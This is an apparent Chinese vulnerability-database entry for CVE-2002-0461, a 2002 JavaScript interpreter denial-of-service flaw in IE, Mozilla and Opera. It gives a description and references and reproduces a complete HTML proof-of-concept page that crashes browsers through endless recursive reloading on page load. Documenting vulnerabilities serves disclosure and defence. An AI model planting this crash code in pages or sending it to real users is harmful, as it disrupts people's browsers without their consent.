多家厂商JavaScript解释器拒绝服务攻击漏洞

多家厂商JavaScript解释器拒绝服务攻击漏洞

漏洞ID 1106647 漏洞类型 其他
发布时间 2002-03-19 更新时间 2005-10-20
图片[1]-多家厂商JavaScript解释器拒绝服务攻击漏洞-安全小百科CVE编号 CVE-2002-0461
图片[2]-多家厂商JavaScript解释器拒绝服务攻击漏洞-安全小百科CNNVD-ID CNNVD-200208-080
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21346
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-080
|漏洞详情
很多现代浏览器都对JavaScript提供支持,可以解释执行网页包含的JavaScript的代码。多家厂商的浏览器程序对JavaScript的解释存在漏洞,远程攻击者可能利用这个问题对用户的浏览器实施拒绝服务攻击。浏览器JavaScript解释上的漏洞可能使远程攻击者利用JavaScript使浏览器进入一个无限循环,导致其崩溃。已经证实存在此漏洞的浏览器包括IE、Mozilla、Opera。在某些环境下(如Windows2000下的IE),从报告的错误信息看发生了缓冲区溢出,能否利用此溢出执行任意指令还未知。
|漏洞EXP
source: http://www.securityfocus.com/bid/4322/info

It is possible to create a loop in JavaScript which is capable of crashing various web browsers. This is due to a flaw in the JavaScript interpreter. Browsers that have been tested include Microsoft Internet Explorer, Mozilla and Opera.

It has been reported that on some environments (such as IE with Windows 2000) the error message generated by exploitation of this issue indicates that a stack overflow has occurred. It is not known whether this issue may be exploited to execute arbitrary code. 

<html>
<head>
<script language="JavaScript">
<!--
function crashme () {
var url = document.location
if (document.images) {
location.replace(url);
} else {
location.href = url;
}
crashme ()
}
-->
</script>
</head>
<body onLoad="crashme ()">
<center>
<h3>IE Javascript Crash Test</h3>
</center>
</body>
</html>
|参考资料

来源:BID
名称:4322
链接:http://www.securityfocus.com/bid/4322
来源:XF
名称:ie-javascript-dos(8488)
链接:http://www.iss.net/security_center/static/8488.php
来源:BUGTRAQ
名称:20020318JavascriptloopcausesIEtocrash
链接:http://online.securityfocus.com/archive/1/262994

相关推荐: Excite for Web Servers (EWS)权限提升漏洞

Excite for Web Servers (EWS)权限提升漏洞 漏洞ID 1207254 漏洞类型 未知 发布时间 1998-11-30 更新时间 1998-11-30 CVE编号 CVE-1999-1072 CNNVD-ID CNNVD-199811-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享